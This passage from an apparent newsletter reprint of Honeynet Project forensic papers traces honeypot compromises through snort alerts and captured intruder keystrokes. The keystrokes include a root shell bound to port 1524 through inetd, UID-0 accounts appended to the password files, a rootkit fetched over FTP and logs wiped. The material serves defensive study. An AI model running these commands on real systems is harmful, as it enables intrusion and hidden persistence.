@apollo /}#telnet 1 152.43.29.52 Trying 152.43.29.52... Connected to 152.43.29.52. Escape character is '^]'. !!!!!!Connection closed by foreign host. te8ot@apollo /]# TERM=vt7877 [root@apollo /]# telnet sparky.w itoot@apollo /]# exit exit Following this, several attempts were made to use the system as a Trinoo attack against other systems. At this point I disconnected the system. The black-hat intended to use the compromised system for destructive purposes and little more could be gained from the monitoring the connection. May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444 May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335 May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444 May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335 May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444 May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335 Summary We have just covered step by step how a honeypot was compromised, backdoored, and eventually used for a Trinoo attack. On 25 April, the black-hat first scanned the honeypot for which version of DNS version it was running. The following day, on 26 April, she executed the NXT-Named exploit to gain a root shell (see the NXT-Howto for a black-hat HOWTO on the exploit). Once she gained a root shell, she created two system accounts, twin and hantu. Following this she immediately telneted to the box, gained super user access, then downloaded and installed her backdoor, bj.c. She then executed a script to cover her tracks and then left the system. Over the following weeks she attempted to connect to the system, however it was offline. Finally, on May 9 she gained access, installed and then executed Trinoo. At this point the honeypot was taken offline for good. The majority of forensics was conducted using system logs from the compromised system and snort logs and alerts. Several other people have contributed additional analysis of the attack. Conclusion We have just covered a step by step analysis of how a honeypot compromised. The goal was to determine how the system was compromised using forensic anaylisis of system and IDS logs. By analyzing this attack, you should have a better understanding of what to expect and look for when analyzing a system attack. If you would like to learn more about how this information was obtained, check out To Build A Honeypot. I would like to thank both Marty Roesch and Max Vision for their contribution to the security community. What I have learned here would not have been possible without their hard work. All logs and information were forwarded to CERT before this information was released. Also, attempts were made to contact all IPs involved in the attack. @HWA 305.0 [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Motives and Psychology of the Black-hat Community Know Your Enemy: Motives Written by the Honeynet Project Last Modified: 27 June, 2000 This paper is a continuation of the Know Your Enemy series. This series is dedicated to learning the tools and tactics of the black-hat community. Unlike the previous papers which focused purely on the "what" and "how" of the black-hat community, specifically the technical tools, their use and implementation, this paper explores the motivation and psychology of the black-hat community, in their very own words. Part I starts with the compromise of a Solaris 2.6 system. Part II provides information rarely published, a record of conversations and actions which took place over a fourteen-day period following the compromise of a honeypot system. Learn how and why black-hats attack systems. Once the Solaris 2.6 system was compromised, the black-hat put an IRC bot on our system. This bot, configured and implemented by the black-hat, captured all their conversations on an IRC channel. We monitored these conversations over a two week period, all of which are contained here. This paper is not meant to be a generalization of the black-hat community. Instead, we present a specific incident involving several individuals. However, this should give you an idea of how certain members can think and behave. This is a common threat that we all face in the security community, and we sincerely hope other security professionals benefit from this work. This information was obtained through the use of a honeynet. A honeynet is a network of various honeypots, designed to be compromised by the black-hat community. While some honeypots are used to divert the attention of attackers from legitimate systems, the purpose of a honeynet is to learn the tools and tactics of the black-hat community. Most of the information provided in this document has been sanitized. Specifically, user identities and passwords, credit card numbers, and most of the system names involved have all been changed. However, the actual technical tools and the chat sessions themselves have not been sanitized. All this information was forwarded to both CERT and the FBI before being released. Also, over 370 notifications were sent out to administrators of systems we believed were compromised. Foreword, by Brad Powell Part I: The Compromise A Solaris 2.6 default installation was used for our honeypot. No modifications or patches were installed on the system. The vulnerabilities discussed here exist in any default, unpatched installation of Solaris 2.6. That is the whole purpose of the honeynet, to identify vulnerabilities in production systems and learn how they are exploited. When exploited, we can then learn the tools and tactics of the black-hat community. The honeynet itself is an environment designed to track the black-hat's every move. On June 4, 2000 our Solaris 2.6 honeypot was compromised with the rpc.ttdbserv Solaris exploit, which allows the execution of code via a buffer overflow in the ToolTalk object database server (CVE-1999-0003). Note that this exploit is also listed as #3 in SANS Top Ten List. This attack was both detected and alerted by snort, a sniffer based IDS system. Jun 4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775 The rpc.ttdbserv exploit is a buffer overflow attack that allows the remote user to execute commands on the system as root. The following command was executed, giving the black-hat a backdoor. The service ingreslock (predefined in /etc/services as port 1524) is added to a file called '/tmp/bob', and then inetd is executed with '/tmp/bob' as the configuration file. /bin/sh is then bound to port 1524 and is running as root, giving the remote user root access. /bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob. Once the black-hat created this backdoor, he connected to port 1524, accessed a shell as root, and executed the following commands. He creates two user accounts, so he can telnet back in. Notice the errors and control characters, the shell on port 1524 does not have a proper environment. # cp /etc/passwd /etc/.tp; ^Mcp /etc/shadow /etc/.ts; echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; echo "r::10891::::::" >> /etc/shadow; echo "re::6445::::::" >> /etc/shadow; : not found # ^M: not found # ^M: not found # ^M: not found # ^M: not found # ^M: not found # who; rsides console May 24 21:09 ^M: not found # exit; Our black-hat now has two accounts on our compromised system. He can now telnet it as the user 're', then su to the user 'r', which has UID 0, thus gaining root access. We will now review the actual keystrokes of the black-hat as they do just that, and more. !"' !"P#$#$'LINUX' SunOS 5.6 login: re Choose a new password. New password: abcdef Re-enter new password: abcdef telnet (SYSTEM): passwd successfully changed for re Sun Microsystems Inc. SunOS 5.6 Generic August 1997 $ su r Our black-hat now has root access. As common, the next step is retrieve the rootkit and take control of the system . First, we see the black-hat create a 'hidden' directory to hide the rootkit. # mkdir /dev/".. " # cd /dev/".. " After creating the directory, the black-hat retrieves the rootkit from another system. # ftp shell.example.net Connected to shell.example.net. 220 shell.example.net FTP server (Version 6.00) ready. Name (shell.example.net:re): j4n3 331 Password required for j4n3. Password:abcdef 230 User j4n3 logged in. ftp> get sun2.tar 200 PORT command successful. 150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes). 226 Transfer complete. local: sun2.tar remote: sun2.tar 1727580 bytes received in 2.4e+02 seconds (6.90 Kbytes/s) ftp> get l0gin 200 PORT command successful. 150 Opening ASCII mode data connection for 'l0gin' (47165 bytes). 226 Transfer complete. 226 Transfer complete. local: l0gin remote: l0gin 47378 bytes received in 7.7 seconds (6.04 Kbytes/s) ftp> quit U221 Goodbye. Once the rootkit is successfully downloaded, the kit is untared and installed. Notice how the entire rootkit is installed by executing a single script, setup.sh. This script also calls another script, secure.sh. You can download the entire Solaris rootkit used in this attack here. # tar -xvf sun2.tar x sun2, 0 bytes, 0 tape blocks x sun2/me, 859600 bytes, 1679 tape blocks x sun2/ls, 41708 bytes, 82 tape blocks x sun2/netstat, 6784 bytes, 14 tape blocks x sun2/tcpd, 19248 bytes, 38 tape blocks x sun2/setup.sh, 1962 bytes, 4 tape blocks x sun2/ps, 35708 bytes, 70 tape blocks x sun2/packet, 0 bytes, 0 tape blocks x sun2/packet/sunst, 9760 bytes, 20 tape blocks x sun2/packet/bc, 9782 bytes, 20 tape blocks x sun2/packet/sm, 32664 bytes, 64 tape blocks x sun2/packet/newbc.txt, 762 bytes, 2 tape blocks x sun2/packet/syn, 10488 bytes, 21 tape blocks x sun2/packet/s1, 12708 bytes, 25 tape blocks x sun2/packet/sls, 19996 bytes, 40 tape blocks x sun2/packet/smaq, 10208 bytes, 20 tape blocks x sun2/packet/udp.s, 10720 bytes, 21 tape blocks x sun2/packet/bfile, 2875 bytes, 6 tape blocks x sun2/packet/bfile2, 3036 bytes, 6 tape blocks x sun2/packet/bfile3, 20118 bytes, 40 tape blocks x sun2/packet/sunsmurf, 11520 bytes, 23 tape blocks x sun2/sys222, 34572 bytes, 68 tape blocks x sun2/m, 9288 bytes, 19 tape blocks x sun2/l0gin, 47165 bytes, 93 tape blocks x sun2/sec, 1139 bytes, 3 tape blocks x sun2/pico, 222608 bytes, 435 tape blocks x sun2/sl4, 28008 bytes, 55 tape blocks x sun2/fix, 10360 bytes, 21 tape blocks x sun2/bot2, 508 bytes, 1 tape blocks x sun2/sys222.conf, 42 bytes, 1 tape blocks x sun2/le, 21184 bytes, 42 tape blocks x sun2/find, 6792 bytes, 14 tape blocks x sun2/bd2, 9608 bytes, 19 tape blocks x sun2/snif, 16412 bytes, 33 tape blocks x sun2/secure.sh, 1555 bytes, 4 tape blocks x sun2/log, 47165 bytes, 93 tape blocks x sun2/check, 46444 bytes, 91 tape blocks x sun2/zap3, 13496 bytes, 27 tape blocks x sun2/idrun, 188 bytes, 1 tape blocks x sun2/idsol, 15180 bytes, 30 tape blocks x sun2/sniff-10mb, 16488 bytes, 33 tape blocks x sun2/sniff-100mb, 16496 bytes, 33 tape blocks # rm sun2.tar # mv l0gin sun2 #cd sun2 #./setup.sh hax0r w1th K1dd13 Ok This thing is complete :-) Here the rootkit installation script first cleans out the log files to delete the information associated with the black-hat's activities. - WTMP: /var/adm/wtmp is Sun Jun 4 11:47:39 2000 /usr/adm/wtmp is Sun Jun 4 11:47:39 2000 /etc/wtmp is Sun Jun 4 11:47:39 2000 /var/log/wtmp cannot open WTMP = /var/adm/wtmp Removing user re at pos: 1440 Done! - UTMP: /var/adm/utmp is Sun Jun 4 11:47:39 2000 /usr/adm/utmp is Sun Jun 4 11:47:39 2000 /etc/utmp is Sun Jun 4 11:47:39 2000 /var/log/utmp cannot open /var/run/utmp cannot open UTMP = /var/adm/utmp Removing user re at pos: 288 Done! - LASTLOG: /var/adm/lastlog is Sun Jun 4 11:47:39 2000 /usr/adm/lastlog is Sun Jun 4 11:47:39 2000 /etc/lastlog cannot open /var/log/lastlog cannot open LASTLOG = /var/adm/lastlog User re has no wtmp record. Zeroing lastlog.. - WTMPX: /var/adm/wtmpx is Sun Jun 4 11:47:39 2000 /usr/adm/wtmpx is Sun Jun 4 11:47:39 2000 /etc/wtmpx is Sun Jun 4 11:47:39 2000 /var/log/wtmpx cannot open WTMPX = /var/adm/wtmpx Done! - UTMPX: /var/adm/utmpx is Sun Jun 4 11:47:39 2000 /usr/adm/utmpx is Sun Jun 4 11:47:39 2000 /etc/utmpx is Sun Jun 4 11:47:39 2000 /var/log/utmpx cannot open /var/run/utmpx cannot open UTMPX = /var/adm/utmpx Done! ./setup.sh: ./zap: not found After cleaning the log files, the next step is to secure our system (how nice of them). They know we are an easy kill and they do not want anyone else to ruin their compromised system. ./secure.sh: rpc.ttdb=: not found #: securing. #: 1) changing modes on local files. #: will add more local security later. #: 2) remote crap like rpc.status , nlockmgr etc.. ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] #: 3) killed statd , rpcbind , nlockmgr #: 4) removing them so they ever start again! 5) secured. 207 ? 0:00 inetd 11467 ? 0:00 inetd cp: cannot access /dev/.. /sun/bot2 kill these processes@!#!@#! cp: cannot access lpq ./setup.sh: /dev/ttyt/idrun: cannot execute Next, an IRC proxy is launched. What is bizarre is that later on the script kills this process. I have no idea why. Irc Proxy v2.6.4 GNU project (C) 1998-99 Coded by James Seter :bugs-> (Pharos@refract.com) or IRC pharos on efnet --Using conf file ./sys222.conf --Configuration: Daemon port......:9879 Maxusers.........:0 Default conn port:6667 Pid File.........:./pid.sys222 Vhost Default....:-SYSTEM DEFAULT- Process Id.......:11599 Exit ./sys222{7} :Successfully went into the background. More file modifications are done. Not seen from the script output are the copying of Trojan binaries, including /bin/login, /bin/ls, /usr/sbin/netstat, and /bin/ps. I highly recommend you review the source of the setup.sh script and the secure.sh script to see what actually happens. One day you may have to review a system that has been rooted with a similar kit. # kill -9 11467 # ps -u root |grep |grep inetd inetd 207 ? 0:00 inetd # ..U/secure.sh/secure.sh ./secure.sh: rpc.ttdb=: not found #: securing. #: 1) changing modes on local files. #: will add more local security later. #: 2) remote crap like rpc.status , nlockmgr etc.. ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] #: 3) killed statd , rpcbind , nlockmgr #: 4) removing them so they ever start again! 5) secured. # ppUs -u s -u U||U grep grep ttUtdbtdb Ups: option requires an argument -- u usage: ps [ -aAdeflcj ] [ -o format ] [ -t termlist ] [ -u userlist ] [ -U userlist ] [ -G grouplist ] [ -p proclist ] [ -g pgrplist ] [ -s sidlist ] 'format' is one or more of: user ruser group rgroup uid ruid gid rgid pid ppid pgid sid pri opri pcpu pmem vsz rss osz nice class time etime stime f s c tty addr wchan fname comm args # ppUs -s -UAdj | grep ttdbAdj | grep ttdb Last, our black-hat launches an IRC bot. The purpose of this bot is to ensure they will maintain ops on the IRC channel of their choice. This bot also recorded all their conversations on the IRC channel. It is this bot that they installed on our compromised system that relayed their IRC chats on our network. # ../me -f bot2 init: Using config file: bot2 EnergyMech 2.7.1, December 2nd, 1999 Starglider Class EnergyMech Compiled on Jan 27 2000 07:06:04 Features: DYN, NEW, SEF init: Unknown configuration item: "NOSEEN" (ignored) init: Mechs added [ save2 ] init: Warning: save2 has no userlist, running in setup mode init: EnergyMech running... # exit; $ exit Once the bot was in place, they left the system alone. It is this bot that captured all of their conversations (see Part II below). For more information on IRC and how the black-hat community uses IRC and bots, we highly recommend the paper Tracking Hackers on IRC by David Brumley. Over the course of the following week they returned several times, only to confirm that they still had access. One week later, on 11 June, they connected again and attempted to use the system for Denial of Service attacks. However, the honeynet is designed to block any attempt to use a honeypot as a base of an attack against outside systems. All attempts to use the honeypot for a Denial of Service attack were automatically blocked. What we have witnessed here are commonly used tools and tactics of the black-hat community. Our black-hat randomly scanned the Internet for a known vulnerability (in this case rpc.ttdbserv). Once identified, they quickly compromised the system and installed a rootkit using commonly scripted tools. Once they had control, they installed a bot, most likely to ensure they would maintain 'ops' on the IRC channels of their choice. What is uncommon are the two weeks of IRC chat sessions that their bot captured for us. In the next part of this paper, we discover the motivations and psychology of the black-hat community, in their own words. If you are concerned that your system(s) may have been compromised by similar means, review this checklist. It covers what to check for and links on how to react to a system compromise. Part II: The IRC Chat Sessions Below are the actual chat sessions of the black-hat community, specifically two individuals whom we will call D1ck and J4n3. Most of their chats will happen on the IRC channel we will call K1dd13. You will read the activities of these two main characters, and a variety of others. The chat sessions are broken down by days, listed below. We recommend you read them in sequence, so you can better understand what is going on. IRC channels, IRC nicks, system names and IP addresses have been sanitized. All system IP addresses have been replaced with RFC 1918 address space, all system domain names have been replaced with 'example', and all credit card numbers have been placed by 'xxxx'. Any similarities the IRC channels or IRC nicks may have with the real world are purely coincidental. Be advised, some of the language used is abusive in nature, we have chosen not to sanitize this. Also, sometimes several of the black-hats will speak foreign languages. Where possible, we have translated this into English. As you read these chat sessions, take into consideration their lack of skill and networking knowledge. Often you will see them attempting to figure out the most fundamental of Unix skills. And yet, they are still able to compromise or damage a large number of systems. This is not a threat to take lightly. Day 1, June 04 Our chat sessions begin with the discussion of building an exploit archive and the sharing of exploits to be used against potential targets. Day 2, June 05 Today D1ck and J4n3 share exploits and Denial of Service attacks. Notice how they brag about how many blists (broadcast amplifier networks) they have for the attacks. Looks like one of them is gunning for Linux boxes in .edu land. They also discussed using new rootkits for Linux and sparc. Day 3, June 06 D1ck and J4n3 brag about the systems they have launched Denial of Service attacks against. Later on D1ck teaches J4n3 how to mount a drive. Then they discuss sniffit (how to use it) and last, D1ck desperately looks for an Irix exploit and rootkit. Day 4, June 07 D1ck and J4n3 decided they want to take out India with Denial of Service attacks and bind exploits. Later on, they DoS other IRC members who irritate them. Day 5, June 08 D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?". Day 6, June 09 Our wonder team has been busy, looks like D1ck rooted over 40 systems. If they scan enough systems, they can and will gain root. Day 7, June 10 Not an exciting day. D1ck teaches a new k1dd13 how to use the sadmind exploit. We are not sure if D1ck even knows how to use it himself. Day 8, June 11 D1ck and J4n3 discuss systems they own and people they want to DoS. D1ck discovers Ping of Death and thinks he is very k3wl. Day 9, June 12 Looks like D1ck strikes it big, he finds an ISP and gains access to their billing and over 5,000 user accounts. Now they have to figure out how to crack them. Day 10, June 13 Sp07 joins the gang today. Not the friendliest individual for the Internet community. Seems to have taken a wee bit of a dislike to India also. Day 11, June 14 They start cracking user passwords and access personal accounts. Day 12, June 15 Also with Romanian Translated D1ck and J4n3 try to find credit card numbers on a Credit Card channel so they can buy some domain names. Day 13, June 16 Also with Romanian Translated D1ck and J4n3 still hangout on the Credit Card channel. Members swap credit cards, shell accounts, and porn sites. At the end of the chat session, D1ck and J4n3 focus on their website. Day 14, June 17 Also with Romanian Translated D1ck and J4n3 cover how to gain accounts on a Linux box, talk more about Credit Cards and continue building a website. We have just reviewed 14 days in the life of the black-hat community. This is not meant to imply that all black-hats think and act like this. In fact, we have focused only on a few specific individuals. However, we hope this information gives you an idea of what many of the community are capable of. They may not be technically competent, or even understand the tools they are using. However by focusing on a large number of systems, they can achieve dramatic results. This is not a threat to take lightly. They are not concerned about what harm they may cause. They focus only on achieving their goals. Conclusion The purpose of this paper is to give you an understanding of the motives and psychology of the black-hat community. The paper started off with the system compromise of a Solaris 2.6 honeypot. It demonstrated a commonly used remote exploit of a vulnerable system. Once compromised, the system was quickly controlled with a rootkit, another commonly used tool among the black-hat community. However, what makes this paper unique is the look you get into the black-hat mentality. Here, you saw in their very own words how they think and act, particularly how they can indiscriminately attack and damage systems. They randomly probe large numbers of systems and attack the weakest systems they can find. By understanding their motives and methods, you can better protect your systems against this threat. Acknowledgments This paper is the result of the work and research of the Honeynet Project. The Honeynet Project is a small group of security professionals dedicated to learning the tools and tactics of the black-hat community. Part of the groups charter is to share these lessons learned with the security community. This paper is the first of future works by this group. Members of the group include: Anne Marie Tenholder, Technology Research - Hiverworld, Inc. Brad Powell, Sun Microsystems GESS Global Security Team Chris Brenton, Dartmouth ISTS David Dittrich, Senior Security Engineer - University of Washington Ed Skoudis - Global Integrity Corp. Frank Heidt - @stake Fyodor, Author of Nmap Security Scanner and Insecure.Org. George Kurtz, CEO - Foundstone, Inc. K2 JD Glaser, NT Security Team - Foundstone, Inc. John McDonald, TUV / Dataprotect GmbH Lance Spitzner, Sun Microsystems GESS Global Security Team. Martin Roesch, Director of Forensic Systems, Hiverworld, Inc Max Vision, creator of arachNIDS and whitehats.com. Robin Wakefield, Sun Microsystems GESS Global Security Team Roger Safian Saumil Shah, Principal Consultant (and Honenynet Project translator)- Foundstone, Inc. Stuart McClure, - Foundstone, Inc. Tom Stracener, Technology Research, Hiverworld, Inc. Vacuum, Technotronic.com Also, I would like to thank Alan Paller of SANS. Though not a member of the Honeynet Project, he has helped me make this research a reality. @HWA 306.0 [IND] Support docs and logs from the Know your enemy papers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ probed.txt - Know your enemy #1 # # All the probes my network received in a sinlge month. # Starting 15 April, 2000 # # You can lookup the IDS number signatures at # Max Vision's ArachNIDs database at # http://www.whitehats.com # # Signatures captured using snort # http://www.snort.org # Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53 Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111 Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80 Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101 Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105 Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107 Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111 Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111 Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111 Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53 Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53 Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53 Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53 Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107 Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107 Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111 Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101 Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111 Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101 Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101 Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53 Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53 Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53 Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53 Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53 Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53 Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111 Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80 Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80 Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80 Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80 Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80 Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125 Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111 Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53 Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111 Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111 Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111 Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111 Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105 Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101 Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169 Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53 Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53 Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72 Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53 Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53 Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80 Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53 Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136 Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080 Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60 Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143 May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60 May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083 May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215 May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53 May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53 May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53 May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53 May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1 May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109 May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111 May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3 May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109 May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1 May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109 May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53 May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53 May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53 May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111 May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111 May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111 May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773 May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 